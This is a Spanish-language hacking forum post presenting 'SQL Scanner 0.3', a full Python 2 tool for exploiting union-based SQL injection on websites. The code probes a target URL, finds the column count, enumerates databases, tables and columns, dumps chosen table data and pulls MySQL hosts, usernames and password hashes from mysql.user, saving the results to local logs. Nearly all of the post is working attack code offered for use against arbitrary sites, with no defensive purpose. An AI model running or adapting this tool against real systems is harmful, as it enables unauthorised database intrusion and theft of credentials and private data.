[Python] SQL Scanner 0.3

Iniciado por BigBear, 7 Octubre 2011, 01:40 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

BigBear

7 Octubre 2011, 01:40 AM Ultima modificación: 8 Octubre 2011, 19:08 PM por Doddy
Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

  • Verifica vulnerabilidad
  • Busca columnas
  • Busca el numero milagroso y saca info sobre la DB
  • Saca tablas y columnas de de la DB actual o otra externa
  • Dumpear usuarios
  • Guarda todo en un log con el nombre de la web en la carpeta /logs


    Código (python) [Seleccionar]

    #!usr/bin/python
    #SQL Scanner 0.3 (C) Doddy Hackman 2010

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    def clean():
    if sys.platform=="win32":
     os.system("cls")
    else:
     os.system("clear")

    def savefile(name,text):
    file = open(name,"a")
    file.write("\n"+text+"\n")
    file.close()

    def gethost(test):
    return urlparse(test).netloc

    def header() :
    print "\n--== SQL Scanner ==--\n"

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
     return("+","--")
    elif bypass == "/*":
     return("/**/","/*")
    else:
     return("+","--")


    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] Values Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       c1 = re.findall("K0BRA(.*?)K0BRA",code2)
       c1 = c1[0]

       c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
       c2 = c2[0]
       print "["+col1+"] : "+c1
       print "["+col2+"] : "+c2+"\n"
       savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
       savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
     print "[-] Not Found\n"



    def mysqluser(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] mysql.user : ON"
     savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
     savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
     print "[+] Users Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       host = re.findall("K0BRA(.*?)K0BRA",code2)
       host = host[0]

       user = re.findall("K0BRA1(.*?)K0BRA1",code2)
       user = user[0]

       passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
       passw = passw[0]
       savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
       savefile("logs/"+gethost(web)+".txt","[User] : "+user)
       savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
       print "[Host] : "+host
       print "[User] : "+user
       print "[Pass] : "+passw+"\n"    
    else:
     print "[-] Not Found\n"



    def showcolumnsdb(web,db,table,passx):
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching columns in DB\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
     savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
       print "[Column Found] : "+column

    else:
     print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
     
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showtables(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    print "\n\n[+] Searching tables\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(17,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showcolumns(tabla,web,passx):
    pass1,pass2 = bypass(passx)
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    print "\n\n[+] Searching tables\n\n"
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       print "[Column Found] : "+column
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    else:
     print "[-] Not Found\n"




    def showdbs(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    print "\n\n[+] Searching DBS\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] DBS Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       db = re.findall("K0BRA(.*?)K0BRA",code2)
       db = db[0]
       print "[DB Found] : "+db
       savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
    else:
     print "[-] Not Found\n"




    def menu(page,bypass):
    clean()
    header()
    print "\n[+] Target : ",page,"\n"
    print "\n[information_schema]\n\n"
    print "1 - Show tables\n"
    print "2 - Show columns of the a table\n"
    print "3 - Show databases\n"
    print "4 - Show tables from the a DB\n"
    print "5 - Show columns from the a table of the DB\n"
    print "\n[mysql.user]\n\n"
    print "6 - Show users\n"
    print "\n[Others]\n\n"
    print "7 - Show details\n"
    print "8 - Dump data\n"
    print "9 - Show log\n"
    print "10 - Change target\n"
    print "11 - Exit\n\n"
    try:
     op = input("[Option] : ")
     if op == 1:
      showtables(page,bypass)
      raw_input()    
      menu(page,bypass)
     elif op == 2:
      table = raw_input("\n\n[Table] : ")
      showcolumns(table,page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 3:
      showdbs(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 4:
      db = raw_input("\n\n[DB] : ")
      showtablesdb(page,db,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 5:
      db = raw_input("\n\n[DB] : ")
      table = raw_input("\n\n[Table] : ")
      showcolumnsdb(page,db,table,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 6:
      mysqluser(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 7:
      more(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 8:
      table = raw_input("\n\n[Table] : ")
      col1 = raw_input("\n\n[Column 1] : ")
      col2 = raw_input("\n\n[Column 2] : ")
      dumper(page,bypass,table,col1,col2)
      raw_input()
      menu(page,bypass)
     elif op == 9:
      os.system("start logs/"+gethost(page)+".txt")
      menu(page,bypass)
     elif op == 10:
      sta()
    except:
     menu(page,bypass)
    if op == 11:
     copyright()
     

    def more(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
     datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
     datar = re.split("K0BRA",datax[0])
     print "[+] Username :",datar[1]
     print "[+] Database :",datar[2]
     print "[+] Version :",datar[3],"\n"
     savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
     savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
     savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
      print "[+] mysql.user : on"
      savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
      print "[+] information_schema.tables : on"
      savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

    def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2,30):
     number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
     code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
     if (re.findall("K0BRA(.*?)K0BRA",code)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code)
      print "[+] Column length :",te
      print "[+] Numbers",numbers,"print data"
      sql = ""
      tex = te + 1
      for sqlix in range(2,tex):
       sql = str(sql)+","+str(sqlix)
       sqli  = str(1)+sql
      sqla = re.sub(numbers[0],"hackman",sqli)
      savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
      menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

    print "[-] Length dont found\n"
     
       
    def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[+] SQLI Detected"
     findlength(web,passx)
    else:
     print "[-] Not Vulnerable"
     copyright()


    def sta():

    clean()
    header()

    web = raw_input("\n\n[Page] : ")
    bypasx = raw_input("\n\n[Bypass] : ")
    scan(web,bypasx)

    sta()

    #The End
Imprimir
Ir Arriba Páginas1
Acciones del Usuario